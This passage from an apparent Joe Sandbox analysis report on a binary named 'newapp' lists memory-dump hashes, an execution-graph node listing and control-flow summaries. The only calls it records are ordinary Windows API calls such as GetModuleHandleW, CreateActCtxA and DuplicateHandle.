                                                                                                            • Opcode Fuzzy Hash: 4ebdf6f63016f65979455a363d0240e4f52a20d129da68ac1394bc12dd138dc5
                                                                                                            • Instruction Fuzzy Hash: 4C01D620D4D3C11FD36253799C1069ABFB49F42250B0A81E7D454CF1A7EE18DC48C7E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10d2d8e9efddb1d281f990fd564c04cdf3e2698289587ee3c093288154e191d2
                                                                                                            • Instruction ID: 0653bfe1421007fed1ee6f4352ee4faf9751e341834d41c469b58e33f6fad277
                                                                                                            • Opcode Fuzzy Hash: 10d2d8e9efddb1d281f990fd564c04cdf3e2698289587ee3c093288154e191d2
                                                                                                            • Instruction Fuzzy Hash: 69013130F004255FDB50DA7DF85872AB7D6EB89754F108439E50ECB364DE25DD028795
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a96782c94963bc1b2f78a22637097b977c74952774d18e2e33ac4d0b58b3285
                                                                                                            • Instruction ID: a26c1d60eda80b99fc16fb808e60a2ca86ce942c9ada8021da84ecd4e447083e
                                                                                                            • Opcode Fuzzy Hash: 1a96782c94963bc1b2f78a22637097b977c74952774d18e2e33ac4d0b58b3285
                                                                                                            • Instruction Fuzzy Hash: E901A232F10229AFCB54DA79E850A9EB779FBC5350F004429E905EB344DB3A9C01C7D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e4405e9de44dd57571e2d32453d828dd1b655bf8ccfd95de5ffa4935e4c49180
                                                                                                            • Instruction ID: 0c2183ca42b11e7d51cab6c20133a23dcdb857f07b7625763b2c2416e0a826b7
                                                                                                            • Opcode Fuzzy Hash: e4405e9de44dd57571e2d32453d828dd1b655bf8ccfd95de5ffa4935e4c49180
                                                                                                            • Instruction Fuzzy Hash: D6F02BB0D063086FDB50DE64CD4566E7BACD702144F1048A5E404CF102F2B3DF1183D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f58562948723b476162d2144a362cd37f16bcddcf44a06f894ca4c11753c049b
                                                                                                            • Instruction ID: ba0763b85b3a211c6f3e5e777bb58dd7508ec575d5b198fdbcbd76ca3b82c9f1
                                                                                                            • Opcode Fuzzy Hash: f58562948723b476162d2144a362cd37f16bcddcf44a06f894ca4c11753c049b
                                                                                                            • Instruction Fuzzy Hash: B3E0E531E403151BD760A67D9900A9EFBD9DF80660F008674E4288F298EF65ED0987D0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: 5b0c70ad529ccde9163282e075492e7f6e727e2a5ee7a155c3d352d2d33b4b11
                                                                                                            • Instruction ID: 872d83f59b718966dfc832db63980514985656e883f14e96253449b4753f1d36
                                                                                                            • Opcode Fuzzy Hash: 5b0c70ad529ccde9163282e075492e7f6e727e2a5ee7a155c3d352d2d33b4b11
                                                                                                            • Instruction Fuzzy Hash: 61120C31E002198FDB64EF69D854AAEB7F2BF89344F2085A9D409AF354DB319D85CF81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 27e88a3b8de1728aace4723b12bc78be7d3fc314c9551f202c4a61ceffee57d3
                                                                                                            • Instruction ID: aa0e45f6e28af5409d5f4bd871bd1bcbcbe9a4977b2b815ff93590ee51c84750
                                                                                                            • Opcode Fuzzy Hash: 27e88a3b8de1728aace4723b12bc78be7d3fc314c9551f202c4a61ceffee57d3
                                                                                                            • Instruction Fuzzy Hash: F4915D31E01209DFDB68DB69D958B6EB7B2EF84380F208429E8019F354DB749D85CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: 0d2dd1c6332df605cb0d6cbb28696ac85c2b53bb42557f7f50c5d87dd28416c7
                                                                                                            • Instruction ID: 504ecfcb4a69513ccc6c70d847037efa82a53062970093b55392a304da528431
                                                                                                            • Opcode Fuzzy Hash: 0d2dd1c6332df605cb0d6cbb28696ac85c2b53bb42557f7f50c5d87dd28416c7
                                                                                                            • Instruction Fuzzy Hash: 53F12C30B00209CFDB59EB79D554A6EBBB6FF84340F208569D4099B368DB35ED86CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: c4c87c88061630202f0818df3b0b130b1ea143abae4b0b9132054d2b27bad5a1
                                                                                                            • Instruction ID: bab495b37e12c7bf2eb8a431657614c66b63b6f34306dd7fcc5a14725a3f6adc
                                                                                                            • Opcode Fuzzy Hash: c4c87c88061630202f0818df3b0b130b1ea143abae4b0b9132054d2b27bad5a1
                                                                                                            • Instruction Fuzzy Hash: 3A718A31E0021ACFDBA8DFA8D9446ADB7A2FF85784B208469D406AF354DB71DD45CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: f08b8270d71b53d6ed674dd936011b64dd4ad6e15b36cef47f6a0c8f1177ea07
                                                                                                            • Instruction ID: b98278e8284bc1979beab56a2d66720792f35da49779251cc5ba412655b4d150
                                                                                                            • Opcode Fuzzy Hash: f08b8270d71b53d6ed674dd936011b64dd4ad6e15b36cef47f6a0c8f1177ea07
                                                                                                            • Instruction Fuzzy Hash: DEB11A31E002098FDB54DBA9DA9469EBBB2FF84390F248429D416DF358DB75DC86CB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            • Opcode ID: 51c5bd3ef4bed62b1be57932703b131042d8c93ad7e352b273177b0658672fe2
                                                                                                            • Instruction ID: cfc2a7d6a7e37d781a0dd240fef0a3f51e3db1370f2ce7e2d518fa6ff4fe4ce5
                                                                                                            • Opcode Fuzzy Hash: 51c5bd3ef4bed62b1be57932703b131042d8c93ad7e352b273177b0658672fe2
                                                                                                            • Instruction Fuzzy Hash: 5551C231B002069FDB54DF68D994A6AB7E6FF88780F148569E416DF3A4DB30EC41CB92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 1900b4d7079c1e9ba5d142acef02cc1774fff1452c5f316f7db492408b6bc4d6
                                                                                                            • Instruction ID: f6fa7933efaba8b8743f4ad4f540f2f51792fe3e106d785fcde54ace11044899
                                                                                                            • Opcode Fuzzy Hash: 1900b4d7079c1e9ba5d142acef02cc1774fff1452c5f316f7db492408b6bc4d6
                                                                                                            • Instruction Fuzzy Hash: 3A51AF31F112058FCF65DB69E980AAEB3B2EB84350F148529E416DF354DB35DD46CB81

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:135
                                                                                                            Total number of Limit Nodes:6
                                                                                                            execution_graph 27509 12bd01c 27510 12bd034 27509->27510 27511 12bd08e 27510->27511 27514 5642818 27510->27514 27519 5642809 27510->27519 27515 5642845 27514->27515 27516 5642877 27515->27516 27524 5642da8 27515->27524 27528 5642d88 27515->27528 27520 5642818 27519->27520 27521 5642877 27520->27521 27522 5642da8 2 API calls 27520->27522 27523 5642d88 2 API calls 27520->27523 27522->27521 27523->27521 27526 5642dbc 27524->27526 27525 5642e48 27525->27516 27532 5642e60 27526->27532 27529 5642da8 27528->27529 27531 5642e60 2 API calls 27529->27531 27530 5642e48 27530->27516 27531->27530 27533 5642e71 27532->27533 27535 5644023 27532->27535 27533->27525 27539 5644040 27535->27539 27543 5644050 27535->27543 27536 564403a 27536->27533 27540 5644092 27539->27540 27542 5644099 27539->27542 27541 56440ea CallWindowProcW 27540->27541 27540->27542 27541->27542 27542->27536 27544 5644092 27543->27544 27546 5644099 27543->27546 27545 56440ea CallWindowProcW 27544->27545 27544->27546 27545->27546 27546->27536 27547 5646698 27548 56466c2 27547->27548 27555 5646584 27548->27555 27551 5646584 GetModuleHandleW 27552 5646730 27551->27552 27553 5646584 GetModuleHandleW 27552->27553 27554 564675f 27553->27554 27556 564658f 27555->27556 27559 5646634 27556->27559 27558 5646701 27558->27551 27560 564663f 27559->27560 27564 1565cfc 27560->27564 27571 156834a 27560->27571 27561 56472dc 27561->27558 27565 1565d07 27564->27565 27567 156860b 27565->27567 27578 156acb9 27565->27578 27566 1568649 27566->27561 27567->27566 27584 156cdb0 27567->27584 27590 156cda0 27567->27590 27572 1568355 27571->27572 27574 156860b 27572->27574 27577 156acb9 GetModuleHandleW 27572->27577 27573 1568649 27573->27561 27574->27573 27575 156cdb0 GetModuleHandleW 27574->27575 27576 156cda0 GetModuleHandleW 27574->27576 27575->27573 27576->27573 27577->27574 27579 156acc2 27578->27579 27581 156ac5e 27578->27581 27596 156acf0 27579->27596 27599 156acdf 27579->27599 27580 156acce 27580->27567 27581->27567 27585 156cdd1 27584->27585 27586 156cdf5 27585->27586 27608 156cf60 27585->27608 27612 156cf1d 27585->27612 27616 156cf4f 27585->27616 27586->27566 27591 156cdb0 27590->27591 27592 156cdf5 27591->27592 27593 156cf60 GetModuleHandleW 27591->27593 27594 156cf4f GetModuleHandleW 27591->27594 27595 156cf1d GetModuleHandleW 27591->27595 27592->27566 27593->27592 27594->27592 27595->27592 27603 156ade8 27596->27603 27597 156acff 27597->27580 27600 156acf0 27599->27600 27602 156ade8 GetModuleHandleW 27600->27602 27601 156acff 27601->27580 27602->27601 27604 156ae1c 27603->27604 27605 156adf9 27603->27605 27604->27597 27605->27604 27606 156b020 GetModuleHandleW 27605->27606 27607 156b04d 27606->27607 27607->27597 27609 156cf6d 27608->27609 27610 156cfa7 27609->27610 27620 156b7c0 27609->27620 27610->27586 27613 156cf8b 27612->27613 27614 156cfa7 27613->27614 27615 156b7c0 GetModuleHandleW 27613->27615 27614->27586 27615->27614 27617 156cf60 27616->27617 27618 156b7c0 GetModuleHandleW 27617->27618 27619 156cfa7 27617->27619 27618->27619 27619->27586 27621 156b7cb 27620->27621 27623 156dcb8 27621->27623 27624 156d0c4 27621->27624 27623->27623 27625 156d0cf 27624->27625 27626 1565cfc GetModuleHandleW 27625->27626 27627 156dd27 27626->27627 27627->27623 27495 156d478 27496 156d4be 27495->27496 27500 156d647 27496->27500 27503 156d658 27496->27503 27497 156d5ab 27501 156d686 27500->27501 27506 156b7d0 27500->27506 27501->27497 27504 156b7d0 DuplicateHandle 27503->27504 27505 156d686 27504->27505 27505->27497 27507 156d6c0 DuplicateHandle 27506->27507 27508 156d756 27507->27508 27508->27501 27628 1564668 27629 156467a 27628->27629 27630 1564686 27629->27630 27634 1564778 27629->27634 27639 1563e34 27630->27639 27632 15646a5 27635 156479d 27634->27635 27643 1564878 27635->27643 27647 1564888 27635->27647 27640 1563e3f 27639->27640 27655 1565c7c 27640->27655 27642 1566ff1 27642->27632 27645 1564888 27643->27645 27644 156498c 27644->27644 27645->27644 27651 15644b4 27645->27651 27649 15648af 27647->27649 27648 156498c 27648->27648 27649->27648 27650 15644b4 CreateActCtxA 27649->27650 27650->27648 27652 1565918 CreateActCtxA 27651->27652 27654 15659db 27652->27654 27656 1565c87 27655->27656 27659 1565c9c 27656->27659 27658 156712d 27658->27642 27660 1565ca7 27659->27660 27663 1565ccc 27660->27663 27662 1567202 27662->27658 27664 1565cd7 27663->27664 27665 1565cfc GetModuleHandleW 27664->27665 27666 1567305 27665->27666 27666->27662

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 317 156ade8-156adf7 318 156ae23-156ae27 317->318 319 156adf9-156ae06 call 1569414 317->319 320 156ae3b-156ae7c 318->320 321 156ae29-156ae33 318->321 326 156ae1c 319->326 327 156ae08 319->327 328 156ae7e-156ae86 320->328 329 156ae89-156ae97 320->329 321->320 326->318 372 156ae0e call 156b070 327->372 373 156ae0e call 156b080 327->373 328->329 330 156aebb-156aebd 329->330 331 156ae99-156ae9e 329->331 334 156aec0-156aec7 330->334 335 156aea0-156aea7 call 156a150 331->335 336 156aea9 331->336 332 156ae14-156ae16 332->326 333 156af58-156b018 332->333 367 156b020-156b04b GetModuleHandleW 333->367 368 156b01a-156b01d 333->368 338 156aed4-156aedb 334->338 339 156aec9-156aed1 334->339 337 156aeab-156aeb9 335->337 336->337 337->334 341 156aedd-156aee5 338->341 342 156aee8-156aef1 call 156a160 338->342 339->338 341->342 348 156aef3-156aefb 342->348 349 156aefe-156af03 342->349 348->349 350 156af05-156af0c 349->350 351 156af21-156af2e 349->351 350->351 353 156af0e-156af1e call 156a170 call 156a180 350->353 357 156af30-156af4e 351->357 358 156af51-156af57 351->358 353->351 357->358 369 156b054-156b068 367->369 370 156b04d-156b053 367->370 368->367 370->369 372->332 373->332
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0156B03E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_1560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 112e6a1a6228b27912f4bc3e774dd0691e3d7754fe8655156f9209541c3208d5
                                                                                                            • Instruction ID: 4f58bb04d73da7cfbadbcf8d295b130bcaf4536152578f60fc13633031fcba26
                                                                                                            • Opcode Fuzzy Hash: 112e6a1a6228b27912f4bc3e774dd0691e3d7754fe8655156f9209541c3208d5
                                                                                                            • Instruction Fuzzy Hash: A0712470A00B058FD724DF69D54479ABBF5FF88304F008A2DD19AEBA50DB35E949CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 374 156590c-1565913 375 1565918-15659d9 CreateActCtxA 374->375 377 15659e2-1565a3c 375->377 378 15659db-15659e1 375->378 385 1565a3e-1565a41 377->385 386 1565a4b-1565a4f 377->386 378->377 385->386 387 1565a60 386->387 388 1565a51-1565a5d 386->388 390 1565a61 387->390 388->387 390->390
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 015659C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_1560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 097251a80213bfa06e8c34209e12e413860ce3e5bea5ff9e4b7d91608f256abe
                                                                                                            • Instruction ID: ce87fc6c0ff0a27c88106bc40c76289524636ef7e955771b08015378a0b2054e
                                                                                                            • Opcode Fuzzy Hash: 097251a80213bfa06e8c34209e12e413860ce3e5bea5ff9e4b7d91608f256abe
                                                                                                            • Instruction Fuzzy Hash: E941B1B1C10719CFDB24CFA9C884ADDBBB5BF49304F24819AD408AB255EB756945CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 391 15644b4-15659d9 CreateActCtxA 394 15659e2-1565a3c 391->394 395 15659db-15659e1 391->395 402 1565a3e-1565a41 394->402 403 1565a4b-1565a4f 394->403 395->394 402->403 404 1565a60 403->404 405 1565a51-1565a5d 403->405 407 1565a61 404->407 405->404 407->407
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 015659C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_1560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 692aae99c41d48af124d77b1ca295376ebe7882221ba00ccfd1b1e5343f7c43e
                                                                                                            • Instruction ID: b353cafa9cbd4f34e0ebc292bf97ff0963e8aa32d141ee71d373164b00230afe
                                                                                                            • Opcode Fuzzy Hash: 692aae99c41d48af124d77b1ca295376ebe7882221ba00ccfd1b1e5343f7c43e
                                                                                                            • Instruction Fuzzy Hash: 3941A2B0C10719CFDB24DFA9C884B9DBBF5BF49304F2481AAD408AB255EB756985CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 408 5644050-564408c 409 5644092-5644097 408->409 410 564413c-564415c 408->410 411 5644099-56440d0 409->411 412 56440ea-5644122 CallWindowProcW 409->412 416 564415f-564416c 410->416 418 56440d2-56440d8 411->418 419 56440d9-56440e8 411->419 414 5644124-564412a 412->414 415 564412b-564413a 412->415 414->415 415->416 418->419 419->416
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05644111
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2037827216.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_5640000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: f9160a728c048fd39bfe915fe3685dac9ed5f2ef91145adbfe04fa11296a764e
                                                                                                            • Instruction ID: a5711d48c62f2bfb2d87b007745a38c64890418174741dc359f94304ef3de29e
                                                                                                            • Opcode Fuzzy Hash: f9160a728c048fd39bfe915fe3685dac9ed5f2ef91145adbfe04fa11296a764e
                                                                                                            • Instruction Fuzzy Hash: 1F4129B4900305CFCB14CF99C849BAABBF5FB98314F24C459D519AB321D775A841CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 422 156b7d0-156d754 DuplicateHandle 424 156d756-156d75c 422->424 425 156d75d-156d77a 422->425 424->425
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0156D686,?,?,?,?,?), ref: 0156D747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_1560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 663d5fb12ffc332e6f66001f84cfc943741c6965ae89ad644328a5aca7fbb583
                                                                                                            • Instruction ID: ad15fed91cf83eea83fbc9d383fb6db5844ec0c4bb9feb15eec62c39affb9d73
                                                                                                            • Opcode Fuzzy Hash: 663d5fb12ffc332e6f66001f84cfc943741c6965ae89ad644328a5aca7fbb583
                                                                                                            • Instruction Fuzzy Hash: 0A21E4B5900248DFDB10CF9AD584AEEBFF8FB48310F14841AE958A7310D379A954CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 428 156d6b9-156d754 DuplicateHandle 429 156d756-156d75c 428->429 430 156d75d-156d77a 428->430 429->430
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0156D686,?,?,?,?,?), ref: 0156D747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_1560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: e32596cdccfb3140ba35e431222488918e207aebaff5cb6a0555f967acae72bd
                                                                                                            • Instruction ID: b6c78ad0780fab3d9475263815a06b96b1c04b1c3b0481cbf81c42943e52a663
                                                                                                            • Opcode Fuzzy Hash: e32596cdccfb3140ba35e431222488918e207aebaff5cb6a0555f967acae72bd
                                                                                                            • Instruction Fuzzy Hash: 1E21E3B5900259DFDB10CF99D584ADEBBF4FB48314F14841AE958B7210D378A940CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 433 156afd8-156b018 434 156b020-156b04b GetModuleHandleW 433->434 435 156b01a-156b01d 433->435 436 156b054-156b068 434->436 437 156b04d-156b053 434->437 435->434 437->436
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0156B03E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_1560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 75f2277e0b0b7c3d5674d266781aa558ac0b06b3010ee721fcaa00169cf76060
                                                                                                            • Instruction ID: 026a7754a8fda751c8a9aec06c9fd3a03c36ad5b0ac933d829e596c42d42b419
                                                                                                            • Opcode Fuzzy Hash: 75f2277e0b0b7c3d5674d266781aa558ac0b06b3010ee721fcaa00169cf76060
                                                                                                            • Instruction Fuzzy Hash: 89110FB6D002498FDB20CF9AC444ADEFBF8AB88224F10842AD568A7210D379A545CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ad3f6f880b6c9e01b3e21ff46147203ada3fb339ef5047086293dcf0a29a5ca
                                                                                                            • Instruction ID: 4a5162f7acb8cf06a8f00639b1eebd1d61ea0aac79298e9097045918f07c5a34
                                                                                                            • Opcode Fuzzy Hash: 3ad3f6f880b6c9e01b3e21ff46147203ada3fb339ef5047086293dcf0a29a5ca
                                                                                                            • Instruction Fuzzy Hash: 0A216775110208DFDB01DF48C9C0B6ABF65FB88324F60C16DEA090F656C33AE446CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c05b645fc1630b5869e058f5c91bf97436ec7851af6b74b75859175e639f0ea4
                                                                                                            • Instruction ID: 2941edae4301d97d7f832319a1a2a1e1387a6670419bdcbbd85c143534ff1611
                                                                                                            • Opcode Fuzzy Hash: c05b645fc1630b5869e058f5c91bf97436ec7851af6b74b75859175e639f0ea4
                                                                                                            • Instruction Fuzzy Hash: 33216471610208DFDB01DF58C9C0B27BF66FB88310F60C569EA090B656C37AE846CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6269f9784b9a27b48569717e970f8bf45f64397afbc3dde0b0f745e793f47bfb
                                                                                                            • Instruction ID: 36300a7416f0a95375f0fc9b3a5ae76a2b4c4d54c4ccc4dd30c07a3dab07fc9f
                                                                                                            • Opcode Fuzzy Hash: 6269f9784b9a27b48569717e970f8bf45f64397afbc3dde0b0f745e793f47bfb
                                                                                                            • Instruction Fuzzy Hash: EE216470614208DFCB15DF68D9C0BA6BFA1FB88398F20C96DD90A4B256C37BD407CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 40b8a47e3ad159e2b97e4fdf7f9fb894b167218b74ea96bccad46a1e31e85388
                                                                                                            • Instruction ID: 6b05a51630782fb24b4c8019209ccbc4b5dafd1c7d2d79570969c5f85c75b834
                                                                                                            • Opcode Fuzzy Hash: 40b8a47e3ad159e2b97e4fdf7f9fb894b167218b74ea96bccad46a1e31e85388
